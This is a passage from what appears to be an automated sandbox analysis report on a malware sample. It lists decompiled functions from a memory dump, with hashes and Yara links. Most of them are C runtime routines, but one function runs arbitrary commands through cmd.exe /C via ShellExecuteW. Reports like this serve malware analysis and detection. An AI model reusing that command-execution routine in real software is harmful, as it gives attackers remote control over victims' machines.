                                                                                                • Opcode Fuzzy Hash: f7148c9f6f24c60fa663259e72a505c4a84419367b1b05d43e51b382b15f9c92
                                                                                                • Instruction Fuzzy Hash: 4B012830A40F40AFE715BB368D4581B7BE4FF41349700057EE18356AF1D6B89440CF5A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040C0CF, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C13D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 2005118841-1866435925
                                                                                                • Opcode ID: 219397f1a8de8ee3dc2d5258062999fed4375ffcb8299db31ba3680be62b4177
                                                                                                • Instruction ID: 0046c4e782e0893ee8a2606df7dc354e42f0520832f7b2da3c93b813be0b6ee8
                                                                                                • Opcode Fuzzy Hash: 219397f1a8de8ee3dc2d5258062999fed4375ffcb8299db31ba3680be62b4177
                                                                                                • Instruction Fuzzy Hash: B301D470540304FEDA10A790C883FBE3354DB10708F14812BBA45791D3EBBC5946CAAE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004130DD, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E004130DD(void* __edx, void* __ebp, void* __eflags, char _a16, char _a60, void* _a84, char _a88, void* _a128, void* _a152) {
				void* _t11;

				_t41 = __eflags;
				_t11 = E00404260(0,  &_a88, E00401F87(E00401E3B( &_a16, __edx, __eflags, 0)));
				_t35 = L"/C ";
				ShellExecuteW(0, L"open", L"cmd.exe", E00401EDD(E004043E6(0,  &_a60, L"/C ", _t41, _t11)), 0, 0);
				E00401EE2();
				E00401EE2();
				E00401E66( &_a16, _t35);
				E00401FB9();
				E00401FB9();
				return 0;
			}




                                                                                                0x004130dd
                                                                                                0x004130f7
                                                                                                0x004130fd
                                                                                                0x0041311f
                                                                                                0x00413129
                                                                                                0x00413bb7
                                                                                                0x00413df2
                                                                                                0x00413dfe
                                                                                                0x00413e0a
                                                                                                0x00413e17

                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041311F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExecuteShell
                                                                                                • String ID: /C $cmd.exe$open
                                                                                                • API String ID: 587946157-3896048727
                                                                                                • Opcode ID: f338c4e7b7bac6c8d5b47e256eb18be6903d08038c5a7bf254c8e86812f10a86
                                                                                                • Instruction ID: 3fa309dd2515112584df72d140a70bb530d66ccf367d4607847ef92242266621
                                                                                                • Opcode Fuzzy Hash: f338c4e7b7bac6c8d5b47e256eb18be6903d08038c5a7bf254c8e86812f10a86
                                                                                                • Instruction Fuzzy Hash: 16F03B712082055AC204FB72DCD2DBFB398EB90309F50093FF547911E2EF789909865E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00446437, Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 75%
                                                                                                			E00446437(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00436267(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0x75f68510
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00451F80( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00451F80( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xff8bc35f
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00432D80(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00451F80( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00451C80();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00451C80();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00451C80();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E0044673A(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00452060(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00438932();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00437709();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                                                                                                0x00446437
                                                                                                0x00446442
                                                                                                0x00446449
                                                                                                0x0044644b
                                                                                                0x0044644b
                                                                                                0x0044644d
                                                                                                0x00446456
                                                                                                0x00446458
                                                                                                0x0044645d
                                                                                                0x00446463
                                                                                                0x00446479
                                                                                                0x0044647e
                                                                                                0x00446481
                                                                                                0x0044648e
                                                                                                0x00446493
                                                                                                0x004464e7
                                                                                                0x004464ef
                                                                                                0x004464f1
                                                                                                0x004464f3
                                                                                                0x004464f6
                                                                                                0x004464f6
                                                                                                0x004464f6
                                                                                                0x004464fc
                                                                                                0x00446504
                                                                                                0x00446517
                                                                                                0x0044651a
                                                                                                0x0044651c
                                                                                                0x0044651f
                                                                                                0x00446520
                                                                                                0x00446541
                                                                                                0x00446544
                                                                                                0x00446544
                                                                                                0x00446522
                                                                                                0x00446522
                                                                                                0x00446524
                                                                                                0x0044652f
                                                                                                0x0044652f
                                                                                                0x00446531
                                                                                                0x00446538
                                                                                                0x00446533
                                                                                                0x00446533
                                                                                                0x00446533
                                                                                                0x00446531
                                                                                                0x00446545
                                                                                                0x00446547
                                                                                                0x00446548
                                                                                                0x0044654b
                                                                                                0x0044654d
                                                                                                0x00446557
                                                                                                0x00446561
                                                                                                0x0044654f
                                                                                                0x0044654f
                                                                                                0x0044654f
                                                                                                0x00446566
                                                                                                0x00446566
                                                                                                0x0044656b
                                                                                                0x0044656e
                                                                                                0x00446579
                                                                                                0x00446579
                                                                                                0x00446579
                                                                                                0x00446579
                                                                                                0x0044657d
                                                                                                0x00446584
                                                                                                0x00446585
                                                                                                0x00446588
                                                                                                0x0044658b
                                                                                                0x0044658b
                                                                                                0x0044658d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004465a5
                                                                                                0x004465ac
                                                                                                0x004465b0
                                                                                                0x004465b3
                                                                                                0x004465b6
                                                                                                0x004465b8
                                                                                                0x004465b8
                                                                                                0x004465b8
                                                                                                0x004465ba
                                                                                                0x004465bd
                                                                                                0x004465c0
                                                                                                0x004465c2
                                                                                                0x004465ca
                                                                                                0x004465d0
                                                                                                0x004465d3
                                                                                                0x004465d6
                                                                                                0x004465d7
                                                                                                0x004465da
                                                                                                0x004465dd
                                                                                                0x004465dd
                                                                                                0x004465e2
                                                                                                0x004465e5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004465fd
                                                                                                0x00446602
                                                                                                0x00446606
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044660a
                                                                                                0x0044660a
                                                                                                0x0044660d
                                                                                                0x0044660e
                                                                                                0x0044660e
                                                                                                0x00446610
                                                                                                0x00446613
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00446615
                                                                                                0x00446618
                                                                                                0x0044661f
                                                                                                0x00446622
                                                                                                0x00446625
                                                                                                0x0044663b
                                                                                                0x0044663b
                                                                                                0x0044663b
                                                                                                0x00446627
                                                                                                0x00446627
                                                                                                0x00446629
                                                                                                0x0044662c
                                                                                                0x00446637
                                                                                                0x0044662e
                                                                                                0x00446631
                                                                                                0x00446631
                                                                                                0x0044662c
                                                                                                0x00000000
                                                                                                0x00446625
                                                                                                0x0044661a
                                                                                                0x0044661a
                                                                                                0x0044661c
                                                                                                0x0044661c
                                                                                                0x00446570
                                                                                                0x00446570
                                                                                                0x00446573
                                                                                                0x0044663e
                                                                                                0x0044663e
                                                                                                0x00446640
                                                                                                0x00446642
                                                                                                0x00446645
                                                                                                0x00446646
                                                                                                0x00446647
                                                                                                0x00446648
                                                                                                0x00446650
                                                                                                0x00446650
                                                                                                0x00446650
                                                                                                0x00446652
                                                                                                0x00446655
                                                                                                0x00446658
                                                                                                0x0044665a
                                                                                                0x0044665a
                                                                                                0x0044665c
                                                                                                0x0044666e
                                                                                                0x00446672
                                                                                                0x00446675
                                                                                                0x0044667c
                                                                                                0x00446684
                                                                                                0x00446684
                                                                                                0x00446687
                                                                                                0x00446689
                                                                                                0x0044669a
                                                                                                0x0044669a
                                                                                                0x0044669e
                                                                                                0x0044669e
                                                                                                0x004466a1
                                                                                                0x004466a3
                                                                                                0x004466a6
                                                                                                0x00000000
                                                                                                0x0044668b
                                                                                                0x0044668b
                                                                                                0x00446691
                                                                                                0x00446691
                                                                                                0x00446695
                                                                                                0x004466a8
                                                                                                0x004466a8
                                                                                                0x004466ac
                                                                                                0x004466ad
                                                                                                0x004466af
                                                                                                0x004466b1
                                                                                                0x004466f2
                                                                                                0x004466f2
                                                                                                0x004466f4
                                                                                                0x00446701
                                                                                                0x00446701
                                                                                                0x00446703
                                                                                                0x00446705
                                                                                                0x00446706
                                                                                                0x00446707
                                                                                                0x0044670e
                                                                                                0x00446711
                                                                                                0x00446713
                                                                                                0x00446713
                                                                                                0x00446714
                                                                                                0x00446716
                                                                                                0x00446719
                                                                                                0x00446719
                                                                                                0x0044671b
                                                                                                0x0044671d
                                                                                                0x00000000
                                                                                                0x0044671d
                                                                                                0x004466f6
                                                                                                0x004466f8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004466fa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004466fc
                                                                                                0x004466ff
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004466ff
                                                                                                0x004466b8
                                                                                                0x004466be
                                                                                                0x004466be
                                                                                                0x004466c0
                                                                                                0x004466c1
                                                                                                0x004466c2
                                                                                                0x004466c3
                                                                                                0x004466ca
                                                                                                0x004466cd
                                                                                                0x004466cf
                                                                                                0x004466d0
                                                                                                0x004466d2
                                                                                                0x004466df
                                                                                                0x004466df
                                                                                                0x004466e1
                                                                                                0x004466e3
                                                                                                0x004466e4
                                                                                                0x004466e5
                                                                                                0x004466ec
                                                                                                0x004466ef
                                                                                                0x004466f1
                                                                                                0x004466f1
                                                                                                0x00000000
                                                                                                0x004466f1
                                                                                                0x004466d4
                                                                                                0x004466d4
                                                                                                0x004466d6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004466d8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004466da
                                                                                                0x004466dd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004466dd
                                                                                                0x004466ba
                                                                                                0x004466bc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004466bc
                                                                                                0x0044668d
                                                                                                0x0044668f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044668f
                                                                                                0x00446689
                                                                                                0x00000000
                                                                                                0x00446573
                                                                                                0x0044656e
                                                                                                0x00446495
                                                                                                0x00446497
                                                                                                0x00000000
                                                                                                0x00446499
                                                                                                0x004464af
                                                                                                0x004464b4
                                                                                                0x004464b6
                                                                                                0x004464c2
                                                                                                0x004464c8
                                                                                                0x004464c9
                                                                                                0x004464cb
                                                                                                0x004464cd
                                                                                                0x004464d8
                                                                                                0x004464d8
                                                                                                0x004464db
                                                                                                0x004464dd
                                                                                                0x004464dd
                                                                                                0x004464e0
                                                                                                0x004464b8
                                                                                                0x004464b8
                                                                                                0x004464b8
                                                                                                0x00000000
                                                                                                0x004464b6
                                                                                                0x00446465
                                                                                                0x00446465
                                                                                                0x0044646c
                                                                                                0x0044646d
                                                                                                0x0044646f
                                                                                                0x00446721
                                                                                                0x00446725
                                                                                                0x0044672a
                                                                                                0x0044672a
                                                                                                0x00446739
                                                                                                0x00446739

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                • String ID:
                                                                                                • API String ID: 1036877536-0
                                                                                                • Opcode ID: a2af8cd21c2361a18f5803fc1ec8a9b21ea48ba1414fc2e6034b653dd8d9e311
                                                                                                • Instruction ID: 7c9d71291fbcf27f37b0e9d1649a705ae8ff0ac9e89dd52880ecb220803812e0
                                                                                                • Opcode Fuzzy Hash: a2af8cd21c2361a18f5803fc1ec8a9b21ea48ba1414fc2e6034b653dd8d9e311
                                                                                                • Instruction Fuzzy Hash: CAA147729003469FFB218F58C8917AEBBE5EF12354F16416FE8859B381C63C8D42C75A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00451434, Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 94%
                                                                                                			E00451434(signed int __edx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				signed int _t17;
				int _t20;
				signed int _t21;
				int _t23;
				signed int _t25;
				int _t28;
				intOrPtr* _t30;
				int _t34;
				int _t35;
				void* _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				int _t46;
				void* _t54;
				void* _t56;
				signed int _t58;
				int _t61;
				int _t63;
				void* _t64;
				void* _t65;
				void* _t66;

				_t58 = __edx;
				_t59 = _a4;
				_t61 = 0;
				_t16 = E00446077(_a4, 0, 0, 1);
				_v20 = _t16;
				_v16 = __edx;
				_t65 = _t64 + 0x10;
				if((_t16 & __edx) != 0xffffffff) {
					_t17 = E00446077(_t59, 0, 0, 2);
					_t66 = _t65 + 0x10;
					_t51 = _t17 & __edx;
					__eflags = (_t17 & __edx) - 0xffffffff;
					if((_t17 & __edx) == 0xffffffff) {
						goto L1;
					}
					_t46 = _a8 - _t17;
					__eflags = _t46;
					_t20 = _a12;
					asm("sbb eax, edx");
					_v8 = _t20;
					if(__eflags < 0) {
						L24:
						__eflags = _t20 - _t61;
						if(__eflags > 0) {
							L19:
							_t21 = E00446077(_t59, _v20, _v16, _t61);
							__eflags = (_t21 & _t58) - 0xffffffff;
							if((_t21 & _t58) != 0xffffffff) {
								_t23 = 0;
								__eflags = 0;
								L31:
								return _t23;
							}
							L20:
							_t23 =  *((intOrPtr*)(E00438932()));
							goto L31;
						}
						if(__eflags < 0) {
							L27:
							_t25 = E00446077(_t59, _a8, _a12, _t61);
							_t66 = _t66 + 0x10;
							__eflags = (_t25 & _t58) - 0xffffffff;
							if((_t25 & _t58) == 0xffffffff) {
								goto L20;
							}
							_t28 = SetEndOfFile(E00449968(_t59));
							__eflags = _t28;
							if(_t28 != 0) {
								goto L19;
							}
							 *((intOrPtr*)(E00438932())) = 0xd;
							_t30 = E0043891F();
							 *_t30 = GetLastError();
							goto L20;
						}
						__eflags = _t46 - _t61;
						if(_t46 >= _t61) {
							goto L19;
						}
						goto L27;
					}
					if(__eflags > 0) {
						L6:
						_t63 = E00440628(_t51, 0x1000, 1);
						_pop(_t54);
						__eflags = _t63;
						if(_t63 != 0) {
							_v12 = E0043EE34(_t54, _t59, 0x8000);
							_t34 = _v8;
							_pop(_t56);
							do {
								__eflags = _t34;
								if(__eflags < 0) {
									L13:
									_t35 = _t46;
									L14:
									_t36 = E004455F6(_t46, _t59, _t63, _t59, _t63, _t35);
									_t66 = _t66 + 0xc;
									__eflags = _t36 - 0xffffffff;
									if(_t36 == 0xffffffff) {
										_t37 = E0043891F();
										__eflags =  *_t37 - 5;
										if( *_t37 == 5) {
											 *((intOrPtr*)(E00438932())) = 0xd;
										}
										L23:
										_t38 = E00438932();
										E004414D5(_t63);
										_t23 =  *_t38;
										goto L31;
									}
									asm("cdq");
									_t46 = _t46 - _t36;
									_t34 = _v8;
									asm("sbb eax, edx");
									_v8 = _t34;
									__eflags = _t34;
									if(__eflags > 0) {
										L12:
										_t35 = 0x1000;
										goto L14;
									}
									if(__eflags < 0) {
										break;
									}
									goto L17;
								}
								if(__eflags > 0) {
									goto L12;
								}
								__eflags = _t46 - 0x1000;
								if(_t46 < 0x1000) {
									goto L13;
								}
								goto L12;
								L17:
								__eflags = _t46;
							} while (_t46 != 0);
							E0043EE34(_t56, _t59, _v12);
							E004414D5(_t63);
							_t66 = _t66 + 0xc;
							_t61 = 0;
							__eflags = 0;
							goto L19;
						}
						 *((intOrPtr*)(E00438932())) = 0xc;
						goto L23;
					}
					__eflags = _t46;
					if(_t46 <= 0) {
						goto L24;
					}
					goto L6;
				}
				L1:
				return  *((intOrPtr*)(E00438932()));
			}
































                                                                                                0x00451434
                                                                                                0x0045143e
                                                                                                0x00451441
                                                                                                0x00451448
                                                                                                0x0045144f
                                                                                                0x00451454
                                                                                                0x00451457
                                                                                                0x0045145d
                                                                                                0x00451470
                                                                                                0x00451477
                                                                                                0x0045147a
                                                                                                0x0045147c
                                                                                                0x0045147f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00451485
                                                                                                0x00451485
                                                                                                0x00451487
                                                                                                0x0045148a
                                                                                                0x0045148c
                                                                                                0x0045148f
                                                                                                0x0045156d
                                                                                                0x0045156d
                                                                                                0x0045156f
                                                                                                0x00451526
                                                                                                0x0045152e
                                                                                                0x00451538
                                                                                                0x0045153b
                                                                                                0x004515bc
                                                                                                0x004515bc
                                                                                                0x004515be
                                                                                                0x00000000
                                                                                                0x004515be
                                                                                                0x0045153d
                                                                                                0x00451542
                                                                                                0x00000000
                                                                                                0x00451542
                                                                                                0x00451571
                                                                                                0x00451577
                                                                                                0x0045157f
                                                                                                0x00451586
                                                                                                0x00451589
                                                                                                0x0045158c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00451596
                                                                                                0x0045159c
                                                                                                0x0045159e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004515a5
                                                                                                0x004515ab
                                                                                                0x004515b8
                                                                                                0x00000000
                                                                                                0x004515b8
                                                                                                0x00451573
                                                                                                0x00451575
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00451575
                                                                                                0x00451495
                                                                                                0x0045149f
                                                                                                0x004514ab
                                                                                                0x004514ae
                                                                                                0x004514af
                                                                                                0x004514b1
                                                                                                0x004514cf
                                                                                                0x004514d2
                                                                                                0x004514d5
                                                                                                0x004514d6
                                                                                                0x004514d6
                                                                                                0x004514d8
                                                                                                0x004514eb
                                                                                                0x004514eb
                                                                                                0x004514ed
                                                                                                0x004514f0
                                                                                                0x004514f5
                                                                                                0x004514f8
                                                                                                0x004514fb
                                                                                                0x00451546
                                                                                                0x0045154b
                                                                                                0x0045154e
                                                                                                0x00451555
                                                                                                0x00451555
                                                                                                0x0045155b
                                                                                                0x0045155b
                                                                                                0x00451563
                                                                                                0x00451569
                                                                                                0x00000000
                                                                                                0x00451569
                                                                                                0x004514fd
                                                                                                0x004514fe
                                                                                                0x00451500
                                                                                                0x00451503
                                                                                                0x00451505
                                                                                                0x00451508
                                                                                                0x0045150a
                                                                                                0x004514e4
                                                                                                0x004514e4
                                                                                                0x00000000
                                                                                                0x004514e4
                                                                                                0x0045150c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0045150c
                                                                                                0x004514da
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004514dc
                                                                                                0x004514e2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0045150e
                                                                                                0x0045150e
                                                                                                0x0045150e
                                                                                                0x00451516
                                                                                                0x0045151c
                                                                                                0x00451521
                                                                                                0x00451524
                                                                                                0x00451524
                                                                                                0x00000000
                                                                                                0x00451524
                                                                                                0x004514b8
                                                                                                0x00000000
                                                                                                0x004514b8
                                                                                                0x00451497
                                                                                                0x00451499
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00451499
                                                                                                0x0045145f
                                                                                                0x00000000

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: dc4f15582d7156a15b2996a60c11fb5524768d57814c45d89d509fb6c11c0c68
